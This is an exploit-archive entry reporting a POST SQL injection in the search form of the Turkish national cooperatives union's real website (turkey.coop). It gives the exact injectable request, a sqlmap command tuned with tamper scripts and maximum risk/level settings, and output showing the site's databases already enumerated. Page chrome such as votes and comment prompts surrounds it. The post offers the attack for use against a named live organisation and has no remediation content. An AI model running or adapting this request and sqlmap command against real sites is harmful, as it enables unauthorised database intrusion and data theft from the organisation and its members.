Türkiye Milli Kooperatifler Birliği POST SQL Injection Vulnerable

2021.09.19

Xale (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Türkiye Milli Kooperatifler Birliği POST SQL Injection Vulnerable
# Date: 2021-04-09
# Exploit Author: Xale 
# Greetz: BetLex & Deus Lorenzo & Qualwin & Cheff & GaskmanTR
# Tested on: Kali Linux

----------------------------------------

"""
Site : turkey.coop
Vulnerable POST:

POST /search HTTP/1.1
Host: www.turkey.coop
Content-Length: 13
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.turkey.coop
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.turkey.coop/contact/Iletisim/7
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

keywords=a%27

sqlmap Payload:

sqlmap -r post --tamper=space2comment,between --hex --risk=3 --level=5 --random-agent --dbs

available databases [2]:                                                            
[*] information_schema
[*] kooperatif



"""

---------------------------------------

See this note in RAW Version

Vote for this issue:

66%

34%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Türkiye Milli Kooperatifler Birliği POST SQL Injection Vulnerable

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.